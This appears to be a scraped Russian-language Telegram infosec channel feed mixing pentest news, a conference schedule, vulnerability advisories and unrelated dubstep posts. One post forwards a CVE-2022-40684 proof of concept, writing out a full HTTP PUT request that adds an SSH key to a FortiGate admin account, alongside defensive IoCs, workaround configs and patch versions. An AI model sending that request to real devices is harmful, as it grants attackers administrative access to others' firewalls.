🇹🇷 Как один турок, домен ломал…
Если вкратце, то пробив был через RCE в Dameware Mini Remote Control.
Nessus сканер легко эту уязвимость определяет на порту 6291/tcp
Далее берем модифицированный PoC и исполняем команду, а там уже дело техники: mimikatz, bloodhound, crackmapexec…
https://bariskoparmal-com.translate.goog/2021/02/01/domain-admine-uzanan-yolculuk/?_x_tr_sl=tr&_x_tr_tl=ru&_x_tr_hl=ru&_x_tr_pto=sc
Если вкратце, то пробив был через RCE в Dameware Mini Remote Control.
Nessus сканер легко эту уязвимость определяет на порту 6291/tcp
Далее берем модифицированный PoC и исполняем команду, а там уже дело техники: mimikatz, bloodhound, crackmapexec…
https://bariskoparmal-com.translate.goog/2021/02/01/domain-admine-uzanan-yolculuk/?_x_tr_sl=tr&_x_tr_tl=ru&_x_tr_hl=ru&_x_tr_pto=sc
Barış Koparmal
Domain Admin’e Uzanan Yolculuk
Kariyerimde benim için özel yere sahip olan ve türlü ekşınlar içeren yeni yazımdan herkese merhaba! Bu yazımda, stajyerlikten sonra siber güvenlik uzmanı ünvanına sahip olduğum ilk günümde takım li…
⚡️В metasploit framework завезли поддержку BOF (Beacon Object File). Пока работает только в сессии WIndows meterpreter.
https://www.rapid7.com/blog/post/2022/10/07/metasploit-weekly-wrap-up-179/
Official doc page
https://www.rapid7.com/blog/post/2022/10/07/metasploit-weekly-wrap-up-179/
Official doc page
Rapid7
Metasploit Weekly Wrap-Up: Oct. 7, 2022 | Rapid7 Blog
This week brings a new feature to the Windows Meterpreter, the Beacon Object File loader. Learn more about this weeks updates!
S02E40
VISION Radio
VISION Radio this week has our man of the moment, Icicle on hosting duties! We listen to the full ‘Post’ album plus some of the songs that inspired his ideas behind the music. You can find an in-depth interview with Jeroen on our Patreon. Enjoy!
#DNB #Icicle #Noisia
#DNB #Icicle #Noisia
🔥2
Forwarded from Sys-Admin InfoSec
Open SysConf'22 - Анонс всех докладов на завтра (14 Октября)
До дня Х осталось меньше суток, завтра по плану будет:
— 11:00 - Вступительное слово
— 11:15 - Сабыржан "novitoll" Тасболатов: Практический опыт с 4G, 5G
— 12:15 - Нурбиби "R0b0Cat": Шаблонизация Linux систем в организациях
— 13:00 - Обед
— 14:00 - Дмитрий "ватман": CDC
— 14:50 - Kutlymurat "manfromkz" Mambetniyazov: История одного CVE
— 15:20 - Roman "sysroman": Ansible AWX by Oracle
— 15:45 - кофе-брейк
— 16:00 - Shelldon "Sh3lldon": DEP vs ROP
— 16:50 - Ilyas B Arinov "t2micro": Старый... Но не бесполезный IRC
— 17:20 - Айдар Оспанбеков: Сети (хуети) в современном датацентре
— 18:05 - Yevgeniy "sysadminkz": Неявный превентинг констракшн
План может меняться, уж не обессудьте. Заряжаем себя и друзей, находим силы и возможности и проводим нашу встречу в добром здравии и отношении.
☀️ Завтра встречаем Вас на первом этаже - ул. Байзакова 280 в SmartPoint, г.Алматы
⚡️ Кто не зарегистрировался, зарегистрируйтесь пожалуйста иначе мест Вам может не хватить, детали здесь: https://sysconf.io
Всем Peace ✌️
До дня Х осталось меньше суток, завтра по плану будет:
— 11:00 - Вступительное слово
— 11:15 - Сабыржан "novitoll" Тасболатов: Практический опыт с 4G, 5G
— 12:15 - Нурбиби "R0b0Cat": Шаблонизация Linux систем в организациях
— 13:00 - Обед
— 14:00 - Дмитрий "ватман": CDC
— 14:50 - Kutlymurat "manfromkz" Mambetniyazov: История одного CVE
— 15:20 - Roman "sysroman": Ansible AWX by Oracle
— 15:45 - кофе-брейк
— 16:00 - Shelldon "Sh3lldon": DEP vs ROP
— 16:50 - Ilyas B Arinov "t2micro": Старый... Но не бесполезный IRC
— 17:20 - Айдар Оспанбеков: Сети (хуети) в современном датацентре
— 18:05 - Yevgeniy "sysadminkz": Неявный превентинг констракшн
План может меняться, уж не обессудьте. Заряжаем себя и друзей, находим силы и возможности и проводим нашу встречу в добром здравии и отношении.
☀️ Завтра встречаем Вас на первом этаже - ул. Байзакова 280 в SmartPoint, г.Алматы
⚡️ Кто не зарегистрировался, зарегистрируйтесь пожалуйста иначе мест Вам может не хватить, детали здесь: https://sysconf.io
Всем Peace ✌️
👍3
Forwarded from Private Shizo
exploit.py
1.9 KB
🔥🔥🔥CVE-2022-40684 - Auth bypass extract admin users and LDAP config - This PoC do only read-only actions.
how to use exploit?
how to use exploit?
python3 exploit.py targetSite
SecAtor
Fortinet в частном порядке предупредила клиентов об уязвимости в системе безопасности, затрагивающей брандмауэры FortiGate и веб-прокси FortiProxy. Критическая уязвимость CVE-2022-40684 имеет оценку CVSS 9,6 и связана с уязвимостью обхода аутентификации,…
вот и рабочий эксплоит 🔥
Please open Telegram to view this post
VIEW IN TELEGRAM
Proof of Concept for FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass (CVE-2022-40684)
💥This POC abuses the authentication bypass vulnerability to set an SSH key for the specified user.
https://github.com/horizon3ai/CVE-2022-40684
💥This POC abuses the authentication bypass vulnerability to set an SSH key for the specified user.
PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 Host: 10.0.40.67 User-Agent: Report Runner Content-Type: application/json Forwarded: for=”[127.0.0.1]:8000″;by=”[127.0.0.1]:9000″; Content-Length: 612 { “ssh-public-key1”: “\”ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOC0lL4quBWMUAM9g/g9TSutzDupGQOnlYqfaNEIZqnSLJ3Mfln6rGSYol/WSm6/N7TNpuVFScRtmdUZ9O8oSamyaizqMG5hcRKRiI49F49judolcffBCTaVpQpxqt+tjcuGzZAoIqg6TyHg1BNoja/IjUQIVbNGyzl+DxmsX3mbmIwmffoyV8l4sEOynYqP3TC2Z8wJWv3WGudHMEDXBiyN3lrIDKlHzROWBkGQOcv3dCoYFTkzdKYPMtnTNdGOOF6wgWB3Y/fHyyWvbN23N2mxsgbRMdKTItJJNLGiJwYBHnC3lp2CQQlrYfsAnBQRu56gp7TPgheP+UYyGlYy4mcnsanGYCS4VozGfWwvhTSGEP5Uws/WxWNFq3Be7c/IWPx5AzvzT3iOq9R704xL1BxW9KAkPmjegav/jOEEh5YX7b+HcErMpTfo5DCi0CZilBUn9q/qM3v4HWKgJObaJnycE/PPyZML0xof29qvbXJDy2efYeCUCfxAIHUcJx58= dev@devs-MacBook-Pro.local\”” }https://github.com/horizon3ai/CVE-2022-40684
GitHub
GitHub - horizon3ai/CVE-2022-40684: A proof of concept exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and …
A proof of concept exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager - horizon3ai/CVE-2022-40684
🔥1
🚨Fortinet предлагает workaround в статье и я ее перевел на свой лад
Summary (Описание):
ПОЛНАЯ ЖОПА… Это обход аутентификации в веб интерфейсе. Хакерам достаточно отправить один PUT запрос чтобы добавить ключ ssh пользователю admin.
Exploitation Status (Статус эксплуатации):
Искать в логах IoC:
Workaround (Заплатка на жопу):
FortiOS:
Отключитьнахуй HTTP/HTTPS интерфейс админа!
Настроить access list:
Создать Address Group:
Создать Local-in политику для разрешения доступа к менеджмент интерфейсу (пример: port1) только для определенной группы:
FortiProxy:
Отключитьнахуй HTTP/HTTPS интерфейс админа!
Настроить access list для доступа к порту 1:
FortiSwitchManager:
Отключитьнахуй HTTP/HTTPS интерфейс админа!
Affected Products (Продукты попавшие под раздачу)
FortiOS versions 5.x, 6.x are NOT impacted.
FortiOS version 7.2.0 through 7.2.1
FortiOS version 7.0.0 through 7.0.6
FortiProxy version 7.2.0
FortiProxy version 7.0.0 through 7.0.6
FortiSwitchManager version 7.2.0
FortiSwitchManager version 7.0.0
Solutions (Сделайте апгрейд ОС ASAP!!!)
Please upgrade to FortiOS version 7.2.2 or above
Please upgrade to FortiOS version 7.0.7 or above
Please upgrade to FortiProxy version 7.2.1 or above
Please upgrade to FortiProxy version 7.0.7 or above
Please upgrade to FortiSwitchManager version 7.2.1 or above
Summary (Описание):
ПОЛНАЯ ЖОПА… Это обход аутентификации в веб интерфейсе. Хакерам достаточно отправить один PUT запрос чтобы добавить ключ ssh пользователю admin.
Exploitation Status (Статус эксплуатации):
Искать в логах IoC:
user=«Local_Process_Acess»Workaround (Заплатка на жопу):
FortiOS:
Отключить
Настроить access list:
config firewall address
edit "my_allowed_addresses"
set subnet <MY IP> <MY SUBNET>
endСоздать Address Group:
config firewall addrgrp
edit "MGMT_IPs"
set member "my_allowed_addresses"
endСоздать Local-in политику для разрешения доступа к менеджмент интерфейсу (пример: port1) только для определенной группы:
config firewall local-in-policy
edit 1
set intf port1
set srcaddr "MGMT_IPs"
set dstaddr "all"
set action accept
set service HTTPS HTTP
set schedule "always"
set status enable
next
edit 2
set intf "any"
set srcaddr "all"
set dstaddr "all"
set action deny
set service HTTPS HTTP
set schedule "always"
set status enable
endFortiProxy:
Отключить
Настроить access list для доступа к порту 1:
config system interface
edit port1
set dedicated-to management
set trust-ip-1 <MY IP> <MY SUBNET>
endFortiSwitchManager:
Отключить
Affected Products (Продукты попавшие под раздачу)
FortiOS versions 5.x, 6.x are NOT impacted.
FortiOS version 7.2.0 through 7.2.1
FortiOS version 7.0.0 through 7.0.6
FortiProxy version 7.2.0
FortiProxy version 7.0.0 through 7.0.6
FortiSwitchManager version 7.2.0
FortiSwitchManager version 7.0.0
Solutions (Сделайте апгрейд ОС ASAP!!!)
Please upgrade to FortiOS version 7.2.2 or above
Please upgrade to FortiOS version 7.0.7 or above
Please upgrade to FortiProxy version 7.2.1 or above
Please upgrade to FortiProxy version 7.0.7 or above
Please upgrade to FortiSwitchManager version 7.2.1 or above
FortiGuard Labs
PSIRT | FortiGuard Labs
None
🔥1
Forwarded from k8s (in)security (Дмитрий Евдокимов)
В сети стала доступна видеозапись доклад "Pentesting Kubernetes: From Zero to Hero" (и слайды) от моего коллеги Сергея Канибора с
Данный доклад скорее является
Если вы только начинаете свой путь в этом направлении, то это прям
VolgaCTF 2022!Данный доклад скорее является
RoadMap, а не полной инструкцией по пентесту Kubernetes. Уместить некоторые моменты в пределах одного доклада не представляется возможным. Так же как и рассказать о всех возможных техниках и нюансах с которыми можно столкнуться при пентесте Kubernetes кластера. Но мы постарались это рассказать максимально компактно и понятно. Если вы только начинаете свой путь в этом направлении, то это прям
MUST WATCH!YouTube
Pentesting Kubernetes: From Zero to Hero / Сергей Канибор / VolgaCTF 2022
Слайды: http://archive.volgactf.ru/volgactf_2022/slides/VolgaCTF_2022_Kanibor.pdf
Pentesting Kubernetes: From Zero to Hero
Спикер: Сергей Канибор, Luntry
________________________
Pentesting Kubernetes: From Zero to Hero
by Sergey Kanibor, Luntry
Pentesting Kubernetes: From Zero to Hero
Спикер: Сергей Канибор, Luntry
________________________
Pentesting Kubernetes: From Zero to Hero
by Sergey Kanibor, Luntry
Forwarded from novitoll_ch (novitoll)
Мой доклад на OpenSysConf'22
sysconf.io
Спасибо @sysadm_in за очередную конфу
https://docs.google.com/presentation/d/1CRWNejM3eZsluQrysvqlDPxy1g_oIaiQ04eB1uNFqmI/edit?usp=sharing
sysconf.io
Спасибо @sysadm_in за очередную конфу
https://docs.google.com/presentation/d/1CRWNejM3eZsluQrysvqlDPxy1g_oIaiQ04eB1uNFqmI/edit?usp=sharing
Google Docs
5_2022_Oct14_sysconf_practical_experience_with_4G
Practical experience with 4G Sabyrzhan “novitoll” Tasbolatov Open SysConf’22, Almaty
🔥1
Forwarded from SecuriXy.kz
#CVE-2022-42889 #Apache #RCE #4Shell
Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell
CVE-ID: CVE-2022-42889
CVSS Score: 9.8
Дата публикации сведений об уязвимости: 17.10.2022
Уязвимые программные продукты:
• JDK 1.8.0_341
• JDK version 9.0-16.0
Рекомендации по устранению уязвимости:
В кратчайшие сроки обновить версию уязвимой библиотеки до актуальной.
Дополнительные материалы:
https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell
CVE-ID: CVE-2022-42889
CVSS Score: 9.8
Дата публикации сведений об уязвимости: 17.10.2022
Уязвимые программные продукты:
• JDK 1.8.0_341
• JDK version 9.0-16.0
Рекомендации по устранению уязвимости:
В кратчайшие сроки обновить версию уязвимой библиотеки до актуальной.
Дополнительные материалы:
https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
🔥1
#DUBSTEP #WAV
786MK001: VA – MORTAL KOMBO #1 EP
Vinyl is OUt Of StoCk..
Only digital form is available on 786 Website.
8 DUBSTEP SUPERHEROES.
4 DEADLY COMBINATIONS.
786MK is MORTAL KOMBO. A new dangerous series.
A collection of 4 spicy collaborations, cooked by some of the most dangerous dubstep producers in the scene.
786MK001: VA – MORTAL KOMBO #1 EP
Vinyl is OUt Of StoCk..
Only digital form is available on 786 Website.
8 DUBSTEP SUPERHEROES.
4 DEADLY COMBINATIONS.
786MK is MORTAL KOMBO. A new dangerous series.
A collection of 4 spicy collaborations, cooked by some of the most dangerous dubstep producers in the scene.
A1. Mr.K & DPRTNDRP – Suppression Dub
A2. Quasar & nova – Witchcraft Dub
B1. Saule & Centauri – Tyrant
B2. Teffa & Sound Unknown – Hide & Seek👍1🔥1